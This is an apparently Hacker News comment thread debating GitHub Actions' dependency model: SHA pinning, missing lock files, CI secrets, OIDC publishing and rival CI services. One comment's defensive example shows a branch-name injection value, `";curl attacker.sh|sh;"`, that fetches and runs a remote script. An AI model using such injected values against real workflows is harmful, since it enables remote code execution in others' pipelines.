GitHub Actions has a package manager, and it might be the worst
Posted by robin_reala 2 days ago
Comments
Comment by bloppe 1 day ago
- Using the commit SHA of a released action version is the safest for stability and security.
- If the action publishes major version tags, you should expect to receive critical fixes and security patches while still retaining compatibility. Note that this behavior is at the discretion of the action's author.
So you can basically implement your own lock file, although it doesn't work for transitive deps unless those are specified by SHA as well, which is out of your control. And there is an inherent trade-off in terms of having to keep abreast of critical security fixes and updating your hashes, which might count as a charitable explanation for why using hashes is less prevalent.
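As a sketch, pinning by SHA looks like this in a workflow file (the SHA below is the one quoted elsewhere in the thread for actions/checkout; you'd verify it against the release tag yourself, and tools like Dependabot can keep the comment and the hash in sync):

```yaml
steps:
  # Full commit SHA instead of a mutable tag; the trailing comment records
  # which release the SHA is believed to correspond to.
  - uses: actions/checkout@f43a0e5ff2bd294095638e18286ca9a3d1956744 # vX.Y.Z
```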
Comment by onionisafruit 1 day ago
Sure you can implement it yourself for direct dependencies and decide to only use direct dependencies that also use commit sha pinning, but most users don’t even realize it’s a problem to begin with. The users who know often don’t bother to use shas anyway.
Or GitHub could spend a little engineer time on a feasible lock file solution.
I say this as somebody who actually likes GitHub Actions and maintains a couple of somewhat well-used actions in my free time. I use sha pinning in my composite actions and encourage users to do the same when using them, but when I look at public repos using my actions it’s probably 90% using @v1, 9% @v1.2 and 1% using commit shas.
[0] Actions was the first Microsoft-led project at GitHub — from before the acquisition was even announced. It was a sign of things to come that something as basic as this was either not understood or swept under the rug to hit a deadline.
Comment by amake 1 day ago
So in other words the strategy in the docs doesn't actually address the issue
Comment by WillDaSilva 1 day ago
Comment by nextaccountic 1 day ago
Comment by bramblerose 1 day ago
This is not true for stability in practice: the action often depends on a specific Node version (which may not be supported by the runner at some point) and/or a versioned API that becomes unsupported. I've had better luck with @main.
Comment by bloppe 1 day ago
Comment by Dylan16807 1 day ago
Comment by csomar 1 day ago
Comment by Griffinsauce 11 hours ago
Comment by saagarjha 2 days ago
Comment by wnevets 1 day ago
That isn't gonna get better anytime soon.
"GitHub Will Prioritize Migrating to Azure Over Feature Development" [1]
[1] https://thenewstack.io/github-will-prioritize-migrating-to-a...
Comment by amarant 1 day ago
Comment by phantasmish 1 day ago
Retrofitting that into "cloud" bullshit is such a bad idea.
Comment by theamk 1 day ago
Using bare-metal requires competent Unix admins, and the Actions team is full of javascript clowns (see: the decision to use dashes in environment variable names; the lack of any sort of shell quoting support in templates; keeping logs next to binaries in self-hosted runners). Perhaps they would be better off using infra someone else maintains.
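The template-quoting complaint refers to a well-documented injection pattern: `${{ }}` expressions are substituted into the script text before the shell ever parses it. A minimal sketch of the vulnerable shape and the usual mitigation (passing the value through an environment variable):

```yaml
# Vulnerable: a branch name like `";curl attacker.sh|sh;"` becomes shell
# code, because the expression is expanded before the shell runs.
- run: echo "Building ${{ github.head_ref }}"

# Safer: pass the untrusted value through the environment, where normal
# shell quoting applies.
- run: echo "Building $HEAD_REF"
  env:
    HEAD_REF: ${{ github.head_ref }}
```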
Comment by godelski 1 day ago
> requires competent Unix admins
Who knows where a $3.7T company is ever going to find competent Unix admins...
> Perhaps they would be better off using infra someone else maintains.
They're handing it from themselves to themselves. We're talking about Microsoft, not some startup.
Comment by dijit 1 day ago
So does running VMs in a cloud provider.
Except now we call them "DevOps" or "SRE" and pay them 1.5-2x.
(as a former SRE myself, I'm not complaining).
Comment by gregoryl 20 hours ago
We had a critical outage because they deprecated Windows 2019 agents a month earlier than scheduled. MS support had the gall to both blame us for not migrating sooner, and refuse to escalate for 36 hours!
Comment by sebazzz 1 day ago
Comment by mixedbit 1 day ago
Comment by Normal_gaussian 1 day ago
GitHub also runs a free tier with significant usage.
There are ~1.4b paid instances of Windows 10/11 desktop; and ~150m Monthly active accounts on GitHub, of which only a fraction are paid users.
Windows is generating something in the region of $30b/yr for MS, and GitHub is around $2b/yr.
MS have called out that Copilot is responsible for 40% of revenue growth in GitHub.
Windows isn't what developers buy, but it is what end users buy. There are a lot more end users than developers. Developers are also famously stingy. However, in both products the margin is in the new tech.
Comment by tonyhart7 1 day ago
but GitHub pairs well with MS's other core products like Azure and the VS/VSC department
MS has a good chance at vertical integration over how software gets written, from scratch to production. If they can somehow bundle everything into an all-in-one membership like a Google One subscription, I think they have a good chance
Comment by samhh 1 day ago
Comment by servercobra 1 day ago
Only downside is they never got back to us about their startup discount.
Comment by bksmithconnor 1 day ago
could you shoot me your GH org so I can apply your startup discount? feel free to reach out to support@blacksmith.sh and I'll get back to you asap. thanks for using blacksmith!
Comment by servercobra 1 day ago
Comment by 999900000999 1 day ago
GitHub actions more or less just work for what most people need. If you have a complex setup, use a real CI/CD system.
Comment by lijok 1 day ago
Comment by bastardoperator 1 day ago
Comment by 999900000999 1 day ago
GitHub Actions are really for just short scripts. Don't take your Miata off road.
Comment by bastardoperator 1 day ago
https://github.com/jenkinsci/jenkins/tree/master/.github/wor...
Comment by cyberpunk 1 day ago
Comment by 999900000999 1 day ago
It's a bit bloated, but it's free and works.
Comment by lijok 1 day ago
Comment by 999900000999 1 day ago
I get the vibe it was never intended to seriously compete with real CI/CD systems.
But then people started using it as such, thus this thread is full of complaints.
Comment by lijok 1 day ago
Comment by drdrey 1 day ago
Comment by LilBytes 1 day ago
Comment by kylegalbraith 1 day ago
Comment by kylegalbraith 1 day ago
Comment by herpdyderp 1 day ago
Comment by kylegalbraith 1 day ago
Comment by whiskey-one 21 hours ago
Comment by herpdyderp 1 day ago
Comment by eviks 1 day ago
Comment by blibble 1 day ago
and switch everyone to the dumpster fire that is Azure DevOps
and if you thought GitHub Actions was bad...
Comment by everfrustrated 1 day ago
The GitHub Actions runner source code is all dotnet. GitHub was a Ruby shop.
Comment by fuzzy2 1 day ago
From my perspective, Azure Pipelines is largely the same as GitHub Actions. I abhor this concept of having abstract and opaque “tasks”.
Comment by WorldMaker 1 day ago
Microsoft claims Azure DevOps still has a roadmap, but it's hard to imagine that the real roadmap isn't simply "Wait for more VPs in North Carolina to retire before finally killing the brand".
Comment by re-thc 1 day ago
> and switch everyone to the dumpster fire that is Azure DevOps
The other way around. Azure DevOps is 1/2 a backend for Github these days. Github re-uses a lot of Azure Devops' infrastructure.
Comment by rurban 1 day ago
Comment by Hamuko 1 day ago
I guess Bitbucket is cheaper but you'll lose the savings in your employees bitching about Bitbucket to each other on Slack.
Comment by blackqueeriroh 1 day ago
Comment by Hamuko 1 day ago
Comment by nevon 2 hours ago
Now for the people who were operating Bitbucket, I'm sure it's a relief.
Comment by Ygg2 1 day ago
What if GH actions is considered legacy business in favour of LLMs?
Comment by silverwind 1 day ago
Comment by crote 1 day ago
Comment by coryrc 1 day ago
i.e. from https://github.com/actions/cache/?tab=readme-ov-file#note
Thank you for your interest in this GitHub repo, however, right now we are not taking contributions.
We continue to focus our resources on strategic areas that help our customers be successful while making developers' lives easier. While GitHub Actions remains a key part of this vision, we are allocating resources towards other areas of Actions and are not taking contributions to this repository at this time. The GitHub public roadmap is the best place to follow along for any updates on features we're working on and what stage they're in.
Comment by crote 1 day ago
Comment by everfrustrated 1 day ago
They will occasionally make changes if it aligns with a new product effort driven from within the org.
Saying they're dropping support is a stretch, especially as very few people actually pay for their Support package anyway (yes, they do offer it as a paid option to Enterprise customers)
Comment by saagarjha 1 day ago
Comment by conartist6 1 day ago
Comment by weikju 1 day ago
Comment by captn3m0 1 day ago
> Instead of writing bespoke scripts that operate over GitHub using the GitHub API, you describe the desired behavior in plain language. This is converted into an executable GitHub Actions workflow that runs on GitHub using an agentic "engine" such as Claude Code or Open AI Codex. It's a GitHub Action, but the "source code" is natural language in a markdown file.
Comment by woodruffw 1 day ago
Comment by kokada 1 day ago
Edit: ok, looking at example it makes more sense. The idea is to run specific actions that are probably not well automated, like generating and keeping documentation up-to-date. I hope people don't use it to automate things like CI runs though.
Comment by imglorp 1 day ago
Comment by anentropic 1 day ago
Comment by ptx 1 day ago
Comment by WorldMaker 1 day ago
Comment by Bombthecat 1 day ago
Comment by souenzzo 1 day ago
Comment by bilekas 1 day ago
Comment by Cthulhu_ 1 day ago
(we run a private gitlab instance and a merge request can spawn hundreds of jobs, that's a lot of potential Gitlab credits)
Comment by mhitza 1 day ago
Actions is one thing, but the fact that, after all these years, the new fine-grained access tokens still aren't supported across all the product endpoints (and the granularity is wack) says more about their lack of investment in maintenance.
Comment by vbezhenar 1 day ago
Comment by miohtama 1 day ago
These include
- Gitlab
Open source:
- https://concourse-ci.org/ (discussed in the context of Radicle here https://news.ycombinator.com/item?id=44658820 )
- Jenkins
- etc.
Anyone can complain as much as they want, but unless they put the money where their mouth is, it's just noise from lazy people.
Comment by saagarjha 1 day ago
Comment by rjzzleep 1 day ago
How did we go in 20 years from holding these companies to account when they'd misbehave to acting as if they are poor damsels in distress whenever someone points out a flaw?
Comment by drdec 1 day ago
Honestly I think the problem is more a rosy view of the past versus any actual change in behavior. There have always been defenders of such companies.
Comment by hexbin010 1 day ago
They hired a ton of people on very very good salaries
Comment by tonyhart7 1 day ago
You'd better thank god for MS being lazy and incompetent; the last thing we want is for big tech to be innovative and gain a stronger monopoly
Comment by nsoqm 1 day ago
The opposite, to be lazy and to continue giving them money whilst being unhappy with what you get in return, would actually be more like defending the companies.
Comment by ImPostingOnHN 1 day ago
The opposite, which we see here: to not criticize them, to blame Microsoft's failures on the critics, and even to discourage any such criticism, is actually more like defending large companies.
Comment by miohtama 1 day ago
This especially includes governments and other institutional buyers.
Comment by thrdbndndn 1 day ago
Their size or past misbehaviors shouldn't be relevant to this discussion. Bringing those up feels a bit like an ad hominem. Whether criticism is valid should depend entirely on how GitHub Actions actually works and how it compares to similar services.
Comment by gcr 1 day ago
Comment by Sl1mb0 1 day ago
Comment by thrdbndndn 1 day ago
Comment by Tostino 1 day ago
Comment by wizzwizz4 1 day ago
If the past misbehaviours are exactly the same shape, there's not all that much point re-hashing the same discussion with the nouns renamed.
Comment by ironmagma 1 day ago
Comment by rjzzleep 1 day ago
Here we are talking about one of the world's most valuable companies, which gets all sorts of perks, benefits and preferential treatment from entities and governments around the globe, and somehow we have to be grateful when they deliver garbage while milking the business they bought.
Comment by ironmagma 1 day ago
Comment by baq 1 day ago
Comment by ironmagma 1 day ago
Comment by baq 1 day ago
Comment by ironmagma 1 day ago
And besides that, a lot of people on here do pay for Github in the first place.
Comment by XCabbage 1 day ago
(I find it extremely sketchy from a competition law perspective that Microsoft, as the owner of npm, has implemented a policy banning npm publishers from publishing via competitors to GitHub Actions - a product that Microsoft also owns. But they have; that is the reality right now, whether it's legal or not.)
Comment by woodruffw 1 day ago
(It can also be extended to arbitrary third party IdPs, although the benefit of that is dependent on usage. But if you have another CI/CD provider that you’d like to integrate into PyPI, you should definitely flag it on the issue tracker.)
Comment by LtWorf 1 day ago
Comment by ChrisMarshallNY 1 day ago
I used to work for a Japanese company, and one of their core philosophies was “Don’t complain, unless you have a solution.” In my experience, this did not always have optimal outcomes: https://littlegreenviper.com/problems-and-solutions/
Comment by hrimfaxi 1 day ago
Comment by ChrisMarshallNY 1 day ago
Comment by klausa 1 day ago
Comment by miohtama 1 day ago
Comment by klausa 1 day ago
Just refuse to do my job because I think the tools suck?
Comment by weakfish 1 day ago
So I’m part of the problem? Me specifically?
Comment by CamouflagedKiwi 1 day ago
I used Travis rather longer ago, it was not great. Circle was a massive step forward. I don't know if they have improved it since but it only felt useful for very simplistic workflows, as soon as you needed anything complex (including any software that didn't come out of the box) you were in a really awkward place.
Comment by Griffinsauce 10 hours ago
Comment by olafmol 1 day ago
For some examples of more advanced usecases take a look: https://circleci.com/blog/platform-toolkit/
Disclaimer: i work for CircleCI.
Comment by CamouflagedKiwi 3 hours ago
Also, honestly, I don't care about any of those features. The main thing I want is a CI system that is fast and customisable and that I don't have to spend a lot of time debugging. I think CircleCI is pretty decent in that regard (the "rerun with SSH" thing is way better than anything else I've seen) but it doesn't seem to be getting any better over time (e.g. caching is still very primitive and coarse-grained).
Comment by aprilnya 1 day ago
Comment by gabrielgio 1 day ago
Once I'm in charge of budget decisions at my company, I'll make sure that none of the money goes to any MS or Atlassian products. Until then I'll keep complaining.
Comment by c0balt 1 day ago
Comment by Bombthecat 1 day ago
Comment by koakuma-chan 1 day ago
Comment by dimgl 1 day ago
Comment by IshKebab 1 day ago
Github Actions is actually one of the better CI options out there, even if on an absolute scale it is still pretty bad.
As far as I can tell nobody has made a CI system that is actually good.
Comment by rileymichael 1 day ago
really surprised there are no others though. dagger.io was in the space but the level of complexity is an order of magnitude higher
Comment by kspacewalk2 1 day ago
Comment by IshKebab 1 day ago
Comment by no_wizard 1 day ago
Comment by Marsymars 1 day ago
Comment by NamlchakKhandro 1 day ago
Don't waste your time
Comment by zulban 1 day ago
Comment by ramon156 1 day ago
Comment by input_sh 1 day ago
What that type of section usually means is "there's someone from Microsoft that signed up for our service using his work account", sometimes it means "there's some tiny team within Microsoft that uses our product", but it very rarely (if ever) means "the entire company is completely reliant on our product".
Comment by SkyPuncher 1 day ago
Comment by baq 1 day ago
My biggest concern with it is that it’s somehow the de facto industry standard. You could do so much better with relatively small investments, but MS went full IE6 with it… and now there’s a whole generation of young engineers who don’t know how short their end of the stick actually is since they never get to compare it to anything.
Comment by bjackman 1 day ago
Personally I've just retired a laptop and I'm planning to turn it into a little home server. I think I'm gonna try spinning up Woodpecker on there, I'm curious to see what a CI system people don't hate is like to live with!
Comment by kminehart 1 day ago
steps:
  - name: backend
    image: golang
    commands:
      - go build
      - go test
  - name: frontend
    image: node
    commands:
      - npm install
      - npm run test
      - npm run build
Yes, it's easy to read and understand and it's container based, so it's easy to extend. I could probably intuitively add on to this. I can't say the same for GitHub, so it has that going for it.
But the moment things start to get a little complex then that's when the waste starts happening. Eventually you're going to want to _do_ something with the artifacts being built, right? So what does that look like?
Immediately that's when problems start showing up...
- You'll probably need a separate workflow that defines the same thing, but again, only this time combining them into a Docker image or a package.
- I am only now realizing that woodpecker is a fork of Drone. This was a huuuge issue in Drone. We ended up using Starlark to generate our drone yaml because it lacked any kind of reusability and that was a big headche.
- If I were to only change a `frontend` file or a `backend` file, then I'm probably going to end up wasting time and compute rebuilding the same artifacts over and over.
- GitHub's free component honestly hurts itself here. I don't have to care about waste if it's mostly free anyways.
- Running locally using the local backend... looks like a huge chore. In Drone this was basically impossible.
I really wish someone would take a step back and really think about the problems being solved here and where the current tooling fails us. I don't see much effort being put into the things that really suck about github actions (at least for me): legibility, waste, and the feedback loop.
Comment by duped 1 day ago
By adding one file to your git repo, you get cross-platform build & test of your software that can run on every PR. If your code is open source, it's free(ish) too.
It feels like a weekend project that a couple people threw together and then has been held together by hope and prayers with more focus on scaling it than making it well designed.
Comment by mvc 1 day ago
I'm from a generation who had to use VSS for a few years. The sticks are pretty long these days, even the ones you get from github.
Comment by ChrisMarshallNY 1 day ago
I just had trauma!
I will say that SourceSafe had one advantage: You could create "composite" proxy workspaces.
You could add one or two files from one workspace, and a few from another, etc. The resulting "avatar" workspace would act like they were all in the same workspace. It was cool.
However, absolutely everything else sucked.
I don't miss it.
Comment by gcr 1 day ago
(Git has octopus merges, jj just calls them “merge commits” even though they may have more than two parents)
Comment by ChrisMarshallNY 1 day ago
Git has the concept of "atomic repos." Repos are a single unit, including all files, branches, tags, etc.
Older systems basically had a single repo, with "lenses" into sections of the repo (usually called "workspaces," or somesuch. VSS called them something else, but I can't remember).
I find the atomic repo thing awkward; especially wrt libraries. If I include a package, I get the whole kit & kaboodle; including test harnesses and whatnot. My libraries tend to have a lot more testing code than library code.
Also, I would love to create a "dependency repo," that aggregates the exported parts of the libraries that I'm including into my project, pinned at the required versions. I guess you could say package managers are that, but they are kind of a blunt instrument. Since I eat my own dog food, I'd like to be able to write changes into the dependency, and have them propagate back to their home repo, which I can sort of do now, if I make it a point to find the dependency checkout, make a change, then push that change, but it's awkward.
But that seems crazy complex (and dangerous), so I'm OK with the way things work now.
Comment by gcr 1 day ago
Both git and jj have sparse checkouts these days, it sounds like you’d be into that
Do you vendor the libraries you use? Python packages typically don’t include the testing or docs in wheels uploaded to PyPI, for instance
These days in Pythonland, it’s typical to use a package manager with a lockfile that enforces build reproducibility and SHA signatures for package attestation. If you haven’t worked with tools like uv, you might like their concepts (or you might be immediately put off by their idea of hermetically isolated environments idk)
Comment by ChrisMarshallNY 1 day ago
You can see most of my stuff in GH. You need to look at the organizations, as opposed to my personal repos: https://github.com/ChrisMarshallNY#browse-away
Thanks for the heads-up. I'll give it a gander.
Comment by baq 1 day ago
in a centralized VCS there are viable CICD options like 'check the compiler binaries in' or even 'check the whole builder OS image in' which git is simply not able to handle by design and needs extensions to work around deficiencies. git winning the mindshare battle made these a bit forgotten, but they were industry standard a couple decades ago.
Comment by cindyllm 1 day ago
Comment by andrewaylett 1 day ago
We moved from VSS to SVN, and it took a little encouraging for the person who had set up our branching workflow using that VSS feature to be happy losing it if that freed us from VSS.
Comment by zahlman 1 day ago
Comment by pjc50 1 day ago
Mind you, CI does always involve a surprising amount of maintenance. Update churn is real. And Macs still are very much more fiddly to treat as "cattle" machines.
Comment by ramon156 14 hours ago
Current job is using blacksmith to save on costs, but the reality of it is that this caching layer only adds costs in some of our projects
Comment by dwroberts 1 day ago
There are so many third party actions where the docs or example reference the master branch. A quick malicious push and they can presumably exfiltrate data from a ton of repositories
(Even an explicit tag is vulnerable because it can just be moved still, but master branch feels like not even trying)
Comment by domenkozar 1 day ago
Comment by no_wizard 1 day ago
Comment by amluto 1 day ago
Why do CI/CD systems need access to secrets? I would argue they need access to APIs and they need privileges to perform specific API calls. But there is absolutely nothing about calling an API that fundamentally requires that the caller know a secret.
I would argue that a good CI/CD system should not support secrets as a first-class object at all. Instead steps may have privileges assigned. At most there should be an adapter, secure enclave style, that may hold a secret and give CI/CD steps the ability to do something with that secret, to be used for APIs that don’t support OIDC or some other mechanism to avoid secrets entirely.
Comment by gcr 1 day ago
Let’s just call it secret support.
I agree with your suggestion that capabilities-based APIs are better, but CI/CD needs to meet customers where they’re at currently, not where they should be. Most customers need secrets.
Comment by woodruffw 1 day ago
This all seems right, but the reality is that people will put secrets into CI/CD, and so the platform should provide an at least passably secure mechanism for them.
(A key example being open source: people want to publish from CI, and they’re not going to set up additional infrastructure when the point of using third-party CI is to avoid that setup.)
Comment by amluto 21 hours ago
Comment by qznc 1 day ago
I don't really understand what you mean by "secure enclave style"? How would that be different?
Comment by amluto 1 day ago
I suppose I would make an exception for license keys. Those have minimal blast radii if they leak.
Comment by gcr 1 day ago
Your approach boils down to “lets give each step its own access to its own hardware-protected secrets, but developers shouldn’t otherwise have access”
Which is a great way to “support secrets,” just like the article says.
Comment by PunchyHamster 1 day ago
CI/CD does not exist in the vacuum. If you had CI/CD entirely integrated with the rest of the infrastructure it might be possible to do say an app deploy without passing creds to user code (say have the platform APIs that it can call to do the deployment instead of typical "install the client, get the creds, run k8s/ssh/whatever else needed for deploy").
But that's a high level of integration that's very environment-specific, without all that many positives (so what if you don't need creds; the platform still has permission to make a lot of mess if it gets hijacked), and a lot, lot more code to write vs "run a container and pass it some env vars", which has become the standard
Comment by amluto 1 day ago
On the one hand, CD workflows are less exposed than CI workflows. You only deploy code that has made it through your review and CI processes. In a non-continuous deployment model, you only deploy code when you decide to. You are not running your CD workflow on a third-party pull request.
On the other hand, the actual CD permission is a big deal. If you leak a credential that can deploy to your k8s cluster, you are very, very pwned. Possibly in a manner that is extremely complex to recover from.
I also admit that I find it rather surprising that so many workflows have a push model of deployment like this. My intuition for how to design a CD-style system would be:
1. A release is tagged in source control.
2. Something consumes that release tag and produces a production artifact. This might be some sort of runner that checks out the tagged release, builds it, and produces a ghcr image. Bonus points if that process is cleanly reproducible and more bonus points if there's also an attestation that the release artifact matches the specified tag and all the build environment inputs. (I think that GitHub Actions can do this, other than the bonus points, without any secrets.)
3. Something tells production to update to the new artifact. Ideally this would trigger some kind of staged deployment. Maybe it's continuous, maybe it needs manual triggering. I think that, in many production systems, this could be a message from the earlier stages that tells an agent with production privileges to download and update. It really shouldn't be that hard to make a little agent in k8s or whatever that listens to an API call from a system like GitHub Actions, authenticates it using OIDC, and follows its deployment instructions.
P.S. An attested-reproducible CD build system might be an interesting startup idea.
Comment by PunchyHamster 1 day ago
...but I saw the anti-pattern of "just add a step that does the deploy after CI in the same pipeline" often enough that I think it might be the most common way to do it.
Comment by Kinrany 1 day ago
Of course the general purpose task runner that both run on does need to support secrets
Comment by arccy 1 day ago
Comment by Kinrany 1 day ago
Comment by Kinrany 1 day ago
Only the CI part needs to build; it needs little else and it's the only part of a coherent setup that needs to build.
Comment by regularfry 1 day ago
Comment by jamescrowley 1 day ago
https://docs.github.com/en/actions/how-tos/secure-your-work/...
Comment by regularfry 1 day ago
Comment by Kinrany 1 day ago
Comment by regularfry 1 day ago
Comment by Kinrany 1 day ago
Comment by everfrustrated 1 day ago
I.e. no prod access by editing the workflow definition and pushing it to a branch.
Comment by barrkel 1 day ago
Those tests will need creds to access third party database endpoints.
Comment by lionkor 1 day ago
Comment by hinkley 1 day ago
Comment by themafia 1 day ago
Comment by nijave 1 day ago
Comment by gcr 1 day ago
Or: the deployment service knows the identity of the instance, so its secret is its private key
Or, how PyPI does it: the deployment service coordinates with the trusted CI/CD service to learn the identity of the machine (like its IP address, or a trusted assertion of which repository it’s running on), so the secret is handled in however that out-of-band verification step happens. (PyPI communicates with Github Actions about which pipeline from which repository is doing the deployment, for example)
It’s still just secrets all the way down
Comment by mrweasel 1 day ago
But how does the metadata server know that the CI instance is allowed to access the secret? Especially when the CI/CD system is hosted at a 3rd. party. It needs to present some form of credentials. The CI system may also need permission or credentials for a private repository of packages or artifacts needed in the build process.
For me, a CI/CD system needs two things: Secret management and the ability to run Bash.
Comment by gcr 1 day ago
As for deploying from a trusted service without managing credentials, PyPI calls this "trusted publishing": https://docs.pypi.org/trusted-publishers/
From the docs:
1. Certain CI services (like GitHub Actions) are OIDC identity providers, meaning that they can issue short-lived credentials ("OIDC tokens") that a third party can strongly verify came from the CI service (as well as which user, repository, etc. actually executed);
2. Projects on PyPI can be configured to trust a particular configuration on a particular CI service, making that configuration an OIDC publisher for that project;
3. Release automation (like GitHub Actions) can submit an OIDC token to PyPI. The token will be matched against configurations trusted by different projects; if any projects trust the token's configuration, then PyPI will mint a short-lived API token for those projects and return it;
4. The short-lived API token behaves exactly like a normal project-scoped API token, except that it's only valid for 15 minutes from time of creation (enough time for the CI to use it to upload packages).
You have to add your GitHub repository as a "trusted publisher" to your PyPI packages.
Honestly the whole workflow bothers me -- how can PyPI be sure it's talking to GitHub? What if an attacker could mess with PyPI's DNS? -- but it's how it's done.
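What PyPI actually matches in step 3 is a set of claims inside the OIDC token, which is a JWT. A toy sketch of that matching, with a fabricated token and made-up values (claim names like `repository` and `job_workflow_ref` are the ones GitHub's OIDC tokens carry; real verification must also check the token's signature against the issuer's published keys, which this sketch skips entirely):

```python
import base64
import json

def jwt_claims(token: str) -> dict:
    """Decode a JWT's payload WITHOUT verifying the signature (toy only)."""
    payload_b64 = token.split(".")[1]
    payload_b64 += "=" * (-len(payload_b64) % 4)  # restore stripped padding
    return json.loads(base64.urlsafe_b64decode(payload_b64))

# Fabricated token: header.payload.signature, each segment base64url-encoded.
claims = {
    "repository": "example/project",
    "job_workflow_ref": "example/project/.github/workflows/release.yml@refs/tags/v1.0.0",
}
fake_token = ".".join([
    base64.urlsafe_b64encode(b'{"alg":"RS256"}').decode().rstrip("="),
    base64.urlsafe_b64encode(json.dumps(claims).encode()).decode().rstrip("="),
    "sig",
])

# PyPI-style trust check: does the token come from the configured repository?
decoded = jwt_claims(fake_token)
assert decoded["repository"] == "example/project"
```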
Comment by woodruffw 1 day ago
Comment by hinkley 1 day ago
I keep meaning to write a partially federated CI tool that uses Prometheus for all of its telemetry data but never get around to it. I ended up carving out a couple other things I’d like to be part of the process as a separate app because I was still getting panopticon vibes and some data should just be private.
Comment by zahlman 1 day ago
There is if you pay for API access, surely?
Comment by nijave 1 day ago
Pedantically I'd say maybe it's more fair to say they shouldn't have access to long lived secrets and should only use short lived values.
The "I" stands for Integration so it's inevitable CI needs to talk to multiple things--at the very least a git repo which most cases requires a secret to pull.
Comment by duped 1 day ago
Because you need to be able to sign/notarize with private keys and deploy to cloud environments. Both of these require secrets known to the runner.
Comment by LtWorf 1 day ago
Comment by cyberax 1 day ago
Github actually is doing something right here. You can set it up as a trusted identity provider in AWS, and then use Github to assume a role in your AWS account. And from there, you can get access to credentials stored in Secret Manager or SSM.
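The workflow side of that setup looks roughly like this (a sketch; the role ARN and region are placeholders). The aws-actions/configure-aws-credentials action exchanges the job's OIDC token for short-lived AWS credentials, and the `id-token: write` permission is what lets the job request that token in the first place:

```yaml
permissions:
  id-token: write   # allow the job to request a GitHub OIDC token
  contents: read

steps:
  - uses: aws-actions/configure-aws-credentials@v4
    with:
      role-to-assume: arn:aws:iam::123456789012:role/gha-deploy  # placeholder
      aws-region: us-east-1
  # Later steps see short-lived AWS credentials in the environment;
  # nothing long-lived is stored as a GitHub secret.
```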
Comment by jdeastwood 1 day ago
Comment by sofixa 1 day ago
Comment by jdeastwood 1 day ago
Comment by sofixa 1 day ago
Comment by DuncanCoffee 1 day ago
- name: Retrieve keystore for apk signing
env:
KEYSTORE: ${{ secrets.KEYSTORE }}
run: echo "$KEYSTORE" | base64 --decode > /home/runner/work/keystore.pfk
Comment by amluto 21 hours ago
GitHub should instead let you store that key as a different type of secret such that a specific workflow step can sign with it. Then a compromised runner VM could possibly sign something that shouldn’t be signed but could not exfiltrate it.
Even better would be to be able to have a policy that the only thing that can be signed is something with a version that matches the immutable release that’s being built.
Comment by rurban 23 hours ago
I just converted our old Parrot Travis runners to GitHub Actions. Ten years ago I had constant trouble with Travis's 15-minute timeouts. With GitHub Actions I can run the full test suite (which was not possible with Travis) in 3 minutes. About 8x faster hardware.
Comment by bluenose69 1 day ago
I maintain an R package that is quite stable and is widely used. But every month or so, the GHA on one of the R testing machines will report an error. The messages being quite opaque, I typically spend a half hour trying to see if my code is doing something wrong. And then I simply make a calendar item to recheck it each day for a while. Sure enough, the problems always go away after a few days.
This might be specific to R, though.
Comment by OptionOfT 1 day ago
When you have a multi-platform image, the actual per-platform images are usually not tagged. No point.
But that doesn't mean that they are unreferenced.
So on GitHub Actions, when you upload a multi-platform image, the per-platform images show up in the untagged list. And you can delete them, breaking the multi-platform image, as it now points to blobs that don't exist anymore.
Comment by Raed667 1 day ago
> actions/checkout@f43a0e5ff2bd294095638e18286ca9a3d1956744
Comment by cyphar 1 day ago
Comment by barrkel 1 day ago
Comment by Kovah 1 day ago
Positive example: https://github.com/codecov/codecov-action/blob/96b38e9e60ee6... Negative example: https://github.com/armbian/build/blob/54808ecff253fb71615161...
Comment by cedws 1 day ago
Comment by DalekBaldwin 1 day ago
Comment by jnwatson 1 day ago
The main problem, which this article touches, is that GHA adds a whole new dimension of dependency treadmill. You now have a new set of upstreams that you have to keep up to date along with your actual deployment upstreams.
Comment by esafak 1 day ago
Comment by figmert 1 day ago
Comment by RSHEPP 1 day ago
Comment by akvadrako 1 day ago
GitHub Actions has some rough edges around caching, but all the packaging is totally unimportant and best avoided.
Comment by worldsayshi 1 day ago
Why not just build the workflows themselves as docker images? I guess running other docker images in the workflow would then become a problem.
Comment by novok 12 hours ago
Comment by shepherdjerred 1 day ago
Comment by worldsayshi 21 hours ago
Also, using the dagger github action should make the transition easier I suppose: https://github.com/dagger/dagger-for-github
Comment by sofixa 1 day ago
Because it's clear to write and read. You don't want your CI/CD logic to end up being spaghetti because a super ninja engineer decided they can do crazy stuff just because they can. Same reason why it's a bad idea to create your infrastructure directly in a programming language (unless creating infrastructure is a core part of your software).
> Why not just build the workflows themselves as docker images? I guess running other docker images in the workflow would then become a problem.
That's how Drone CI handled it. GitLab kind of does the same, where you always start as a docker image, and thus if you have a custom one with an entrypoint, it does whatever you need it to.
Comment by weakfish 1 day ago
YAML is fine for data, but inevitably stuff like workflows end up tacking on imperative features to a declarative language.
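A small example of that creep: GitHub's workflow YAML embeds a whole expression language for conditionals, so the "data" file ends up carrying logic (the script path is illustrative):

```yaml
steps:
  - name: Release only on tag pushes
    if: github.event_name == 'push' && startsWith(github.ref, 'refs/tags/')
    run: ./scripts/release.sh
```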
Comment by worldsayshi 19 hours ago
Comment by weakfish 18 hours ago
I really really want to use dagger, but I don’t think there’s organizational interest in it.
Comment by sofixa 20 hours ago
With HCL you can have conditions and types without the full, madness-enabling flexibility of a general-purpose language.
Comment by trueno 1 day ago
Comment by btown 1 day ago
Comment by gwbas1c 18 hours ago
If you do, please submit a "show HN." I'd love to use it.
Comment by nine_k 1 day ago
I hope that Codeberg will become more mainstream for FOSS projects.
I hope another competent player, beside GitLab and Bitbucket, will emerge in the corporate paid space.
Comment by michaelmior 1 day ago
The vast majority of users use GitHub-hosted runners. If you don't trust GitHub, you have bigger problems than whether the correct code for an action is downloaded.
Comment by gwbas1c 18 hours ago
Anyway, software is so complicated that at some level, you need to trust something because it's impossible to personally comprehend and audit all code.
So, you still need to trust git. You still need to trust your OS. You still need to trust the hardware. You just don't have enough minutes in your life to go down through all those levels and understand it well enough to know that there's nothing malicious in there.
Comment by pshirshov 1 day ago
I have a little launcher for that which helps: https://github.com/7mind/mudyla
Comment by Group_B 1 day ago
Comment by alex-ross 1 day ago
Has anyone been bitten by a breaking change from an action update mid-pipeline?
Comment by naikrovek 1 day ago
Comment by asmor 1 day ago
I'm pretty sure it contains the exact line of it being "deeply confused about being a package manager".
Comment by tom1337 1 day ago
I guess the best solution is to just write custom scripts in whatever language one prefers and just call those from the CI runner. Probably missing out on some fancy user interfaces but at least we'd no longer be completely locked into GHA...
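A sketch of that approach: keep the workflow as a thin shim so the real logic lives in a portable script (the script path is illustrative):

```yaml
jobs:
  ci:
    runs-on: ubuntu-latest
    steps:
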